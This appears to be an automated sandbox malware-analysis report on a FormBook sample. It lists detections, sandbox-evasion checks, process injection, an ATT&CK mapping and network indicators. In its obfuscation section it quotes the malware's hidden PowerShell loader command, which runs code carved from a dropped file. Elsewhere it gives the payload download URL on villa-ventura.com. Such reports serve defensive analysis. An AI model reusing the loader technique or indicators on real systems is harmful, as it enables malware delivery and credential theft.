        Source: Binary string: wntdll.pdb source: Sammentrykket.exe, Sammentrykket.exe, 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77133628191.00000000205A0000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: m.Core.pdb0 source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb316567-2969588382-3778222414-1001_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32z source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: Yara match | File source: 00000004.00000002.77583228848.000000000360D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.76792434686.000000000AF9D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Folkebaades $Statsraadssekretrens174 $Koruna), (talehandlinger @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Rundstykkernes = [AppDomain]::CurrentDomain.
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Rebolt226)), $Extensometres).DefineDynamicModule($Elsk, $false).DefineType($Bssemagers61, $Unstigmatised, [System.MulticastDelegate])$
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)" (2 identical entries)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_033C9367 push eax; ret 2_2_033C9381
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_033C31BD push eax; retf 2_2_033C31E1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07A79B2F pushad ; ret 2_2_07A79B39
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (82 identical entries)
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe | Process information set: NOOPENFILEERRORBOX (2 identical entries)
        Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (15 identical entries)

        Malware Analysis System Evasion

        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeAPI/Special instruction interceptor: Address: 39C4C82
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXES9A
        Source: powershell.exe, 00000002.00000002.76787212994.0000000007190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9884Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeWindow / User API: threadDelayed 2449Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeAPI coverage: 2.4 %
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe TID: 7432Thread sleep count: 2449 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeThread sleep count: Count: 2449 delay: -5Jump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeCode function: 0_2_00406850 FindFirstFileW,FindClose,0_2_00406850
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeCode function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C26
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
        Source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exes9a
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
        Source: Sammentrykket.exe, 00000004.00000002.77592666966.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77040018762.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77136726603.0000000004890000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77592580545.0000000004891000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77135363971.00000000048C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: powershell.exe, 00000002.00000002.76787212994.0000000007190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeAPI call chain: ExitProcess graph end nodegraph_0-1468
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeAPI call chain: ExitProcess graph end nodegraph_0-1663
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_032BD51C LdrInitializeThunk,LdrInitializeThunk,2_2_032BD51C
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2091C090 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2091A093 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209F4080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209F50B7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209DB0AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209600A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209CF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2093B0D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2091B0D6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2095D0F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2095D0F0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2091C0F6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209190F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_20945004 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_20945004 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_20928009 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2091D02D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_20921051 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209F505B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_20950044 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_20927072 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_20926074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209C9060 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_20949194 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_20961190 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_20924180 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209F51B6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209531BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209541BB mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209541BB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2095E1A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209301C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209351C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209191F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209301F1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2094F1F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209E81EE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2092A1E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2094B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209291E5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209181EB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2091F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_20950118 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2094510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2092510D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209DF13E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_20957128 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209F3157 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2095415F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209B314A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209F5149 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2091A147 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_20926179 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2097717A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_20927290 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2099E289 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2091C2B0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209FB2BC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209DF2AE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209E92AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209442AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209192AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209432C5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209532C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209F32C9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209302F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209172E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2092A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209282E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2091D2EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2091821B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_209AB214 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_2091A200 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Code function: 4_2_20940230 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtTerminateThread: Direct from: 0x7FF9B4322651
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe  Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section unmapped: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe base address: 400000
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Memory written: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe base: 1660000
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Memory written: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe base: 19FFF4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe "C:\Users\user\AppData\Local\Temp\Sammentrykket.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe  Code function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

        Stealing of Sensitive Information

        Source: Yara match  File source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match  File source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        Source: Yara match  File source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match  File source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        MITRE ATT&CK matrix (the number in parentheses is the count the report shows beside that technique):

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (1) | DLL Side-Loading (1) | Access Token Manipulation (1) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (41) | Remote Services | Archive Collected Data (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
        Credentials | Domains | Default Accounts | Shared Modules (1) | Boot or Logon Initialization Scripts | Process Injection (311) | Virtualization/Sandbox Evasion (12) | LSASS Memory | Virtualization/Sandbox Evasion (12) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | PowerShell (2) | Logon Script (Windows) | Abuse Elevation Control Mechanism (1) | Access Token Manipulation (1) | Security Account Manager | Process Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | DLL Side-Loading (1) | Process Injection (311) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (13) | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Abuse Elevation Control Mechanism (1) | LSA Secrets | File and Directory Discovery (2) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (1) | Cached Domain Credentials | System Information Discovery (113) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (1) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
Behavior Graph ID: 1483268
Sample: PO Tournefortian2453525525235235623425523235.exe
Start date: 26/07/2024
Architecture: WINDOWS
Score: 100

Top level
  DNS/IP: villa-ventura.com
  Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected FormBook; 2 other signatures

PO Tournefortian2453525525235235623425523235.exe (started)
  Created file: C:\Users\user\AppData\...\Heptandrous.Arr (ASCII, dropped)
  Signature: Suspicious powershell command line found
  -> powershell.exe (started)
       Created file: C:\Users\user\AppData\...\Sammentrykket.exe (PE32, dropped)
       Created file: C:\...\Sammentrykket.exe:Zone.Identifier (ASCII, dropped)
       Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Tries to detect Any.run; 3 other signatures
       -> Sammentrykket.exe (started)
            DNS/IP: villa-ventura.com, 185.90.59.130:443 (local port 49778), ONILisbonPortugalPT, Portugal
            Signatures: Multi AV Scanner detection for dropped file; Tries to detect Any.run; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
            -> RAVCpl64.exe (injected)
                 Signature: Found direct / indirect Syscall (likely to bypass EDR)
            -> WerFault.exe (started)
       -> conhost.exe (started)

Antivirus detection

Initial sample
Source | Detection | Scanner | Label
PO Tournefortian2453525525235235623425523235.exe | 29% | ReversingLabs | Win32.Trojan.Generic

Dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Sammentrykket.exe | 29% | ReversingLabs | Win32.Trojan.Generic

Unpacked PE files
No Antivirus matches

Domains
No Antivirus matches

URLs (every entry: 0%, Avira URL Cloud, safe)
https://villa-ventura.com/FPkXcnPDrjTal168.bin
http://nuget.org/NuGet.exe
http://www.apache.org/licenses/LICENSE-2.0.html
https://villa-ventura.com/
https://github.com/Pester/Pester4
http://pesterbdd.com/images/Pester.png
https://contoso.com/
https://nuget.org/nuget.exe
https://aka.ms/pscore6lB
http://pesterbdd.com/images/Pester.png4
https://ocsp.quovadisoffshore.com0
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
http://www.quovadis.bm0
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
http://nsis.sf.net/NSIS_ErrorError
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
https://contoso.com/License
https://contoso.com/Icon
http://www.gopher.ftp://ftp.
https://github.com/Pester/Pester
https://villa-ventura.com/FPkXcnPDrjTal168.binwt?
http://www.apache.org/licenses/LICENSE-2.0.html4
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
villa-ventura.com | 185.90.59.130 | true | false | (none) | unknown

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://villa-ventura.com/FPkXcnPDrjTal168.bin | false | Avira URL Cloud: safe | unknown

URLs found in memory or binary data (every entry: Malicious false, Avira URL Cloud: safe, reputation unknown)
Name | Source
http://pesterbdd.com/images/Pester.png4 | powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp
https://github.com/Pester/Pester4 | powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmp
https://villa-ventura.com/ | Sammentrykket.exe, 00000004.00000003.77136726603.0000000004890000.00000004.00000020.00020000.00000000.sdmp; Sammentrykket.exe, 00000004.00000002.77592580545.0000000004891000.00000004.00000020.00020000.00000000.sdmp
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp
https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.76782450843.00000000050C1000.00000004.00000800.00020000.00000000.sdmp
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp
https://contoso.com/ | powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmp
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmp
https://contoso.com/License | powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmp
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp
